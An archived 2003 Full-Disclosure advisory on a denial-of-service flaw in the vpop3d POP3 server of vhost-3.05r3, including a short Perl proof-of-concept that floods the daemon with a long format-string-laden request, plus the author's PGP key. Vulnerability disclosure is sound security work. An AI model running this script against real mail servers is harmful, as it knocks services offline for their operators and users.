Topic: vhost-3.05r3 DOS Product: vhost-3.05r3 Note: for a laugh grep vpop3d.cc for strcpy or sprintf..loool Vendor Notification: Vendor Notified Background: vhost - one-step solution for all virtual hosting needs Copyright(c) Chaogic Systems, LLC. http://chaogic.com Author: Jake Fan <jakeat_private> allows the setting up of vhosts for mail and web. Problem Description: Seems that an attacker (remote or local) can cause a DOS on the vpop3d server, using a lengthy request.. This seems to cause the pop3 server to timeout then daemon drops...Note this was tested locally, with the binary.. Seems that also if we attach gdb to the running process that also locks vpop3d.. ;) Once we've hit it with our huge USER string it gives this mesg after 5mins or so.. "-ERR POP3 Server Abnormal Shutdown: Timeout waiting for command from client" Impact: DOS on the vpop3d daemon, means a manual restart of the daemon. Patch: Far too much to patch in this code!!! Exploit: Nothing special.. ---------------------------------------------------------- #!/usr/bin/perl #vpop3d Denial Of Service.. #Proof of Concept script.. #Deadbeat, uk2sec.. #e: deadbeatat_private #e: danielsat_private use IO::Socket; $host = $ARGV[0]; $port = $ARGV[1]; if(!$ARGV[1]){ die "usage: perl $0 <host> <port>\n"; } $dos = "%s%s"x5000; $req = "USER $dos"; $sox = IO::Socket::INET->new( Proto=>"tcp", PeerPort=>$port, PeerAddr=>$host )or die "can't connect to $host : $port\n"; sleep 2; print $sox $dos; sleep 1; print "done..vpop3d should lock now :)\n"; ------------------------------EOF------------------------- Regards, Deadbeat, uk2sec.. ------------------------------------- Deadbeat, e: deadbeatat_private e: danielsat_private -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.0.6 (NetBSD) Comment: For info see http://www.gnupg.org mQGiBDxWfZARBACBQnb2BXzrByAvVKIS1w3Hu4vtgwY/C6hAZrPGDpGcRYnXF7a8 uhquXYQ1IM0AXHwZ0Jca8YSQOVfS6UBojU/ZmkRweQVaa7MEJiRwZ/2dPTG572GY nM/grv0XVXun/16y+v3tApRwVkrjbHF3k3UgMzRJxmzMSsDT2XSdN2o34wCgw9+D 5faE/kVRlEs5x50ijIcBFcMD/0oMZ1kV3+YVVpXe2CI+If3PSi2+IAvxgFHeEQQB 6nRwmGsVsh6O7kFHagRUScehQgja2IMCtVan7dFmP1CI/k3TsFSf6suiEdTv1sMV H5N3jJVSAHM6Fm87qhCpeskvdXdkd7n6HPeATmGAaSH3SB3FqVmVq6Qqk/gBK5Qu t87MA/4wGICDZ6/sx0S3S3NBt2oulTUVQbWIgFhgD9wZAyEO6ruKEk1olba0oAaA iA+SAf9EY2RyKw9QhosG6Csgqa80VBvkS+rZXBzaaEXfNxuR6MV3cGrs75l+KKI4 tPofUuD643ALLNo4IgxTHWpTD+sabbSCh7e1Meg6BBQuFWSs6bQwRGFuaWVsICho ZWxvIG5hc3RlZSkgPGRlYWRiZWF0QHNkZi5sb25lc3Rhci5vcmc+iF0EExECAB0F AjxWfZAFCQDtTgAFCwcKAwQDFQMCAxYCAQIXgAAKCRAaRjzWDUUMXXpVAKCHV7p9 vt4wjcAK2aIodmKrdgrECQCgu0u3f1Tt8VPOIhpyZPqYgmGm+TW5Ag0EPFZ9rhAI AMHUvRtSXUmwEbqJuS6FfCRZCzqkegv8HOC9kZNjOb8l7mLQ0NFs2E17FpEk9E5A B2jzX/HDFYiqMJu+xZCfFQMYRMx1KHPCprbM2p4LXJviCTnpEO2FlPiZ54b4s1Dc 56HBfWxLiP9SPCJwWZWEfbqKJI7PnE3kDE+zc7tqhNPyMQZGaWBq1MkTYq9MmM1x wzOPj4Mv0clL4cpyjI6q4gveIEIkZlHwwVO0bpil+7jrM1dSPOoTuitoKsDy6FvO +nnqw/VAn/SE1I9H8hsvN17wa2br7LELhEBycVTsHU/qr4KsxAcz77U/5/K47arG +uM52DoxFpjSpi54Ez83s1cAAwUH/0HSEtOkIETS6jiOKlYFXO/8sOh8yaRr6e9T +da2UNxTEQDz4nNac8TS0UxrBKXTQf8tVnOYajhEG6ZVD10Xvhn0fv9gc96hEIi3 qY8YRVX/TY/PGtVdOBvQuqWjnkSLP5xbDsBa9vdpM9s2XyaEmJ9aLWSBeeO9Hjd9 v91jxJupH7HqxxvhePEtY/QujT5XIk9p4YPzzhBXMf6jLNqIvEFFeAhoNgheodE6 EuRSfh4YJ8dpIKUQxQTtx/hmbnjMpRT/Fi4AI2KGS0wGR8brs94T4J91u4cYrkzL r9Bri0gkxj3L9+nEFSrqm0J7ihbW0blqr+8HZxLeNYXDNtfoqdyITAQYEQIADAUC PFZ9rgUJAO1OAAAKCRAaRjzWDUUMXYlPAKCCZcdDJmlTFCYrBcYoAefYbMEc5ACf aSJMzYo9ENJ22pd/5nw5c2vxsbI= =TwPI -----END PGP PUBLIC KEY BLOCK----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
This archive was generated by hypermail 2b30 : Tue Aug 19 2003 - 04:55:15 PDT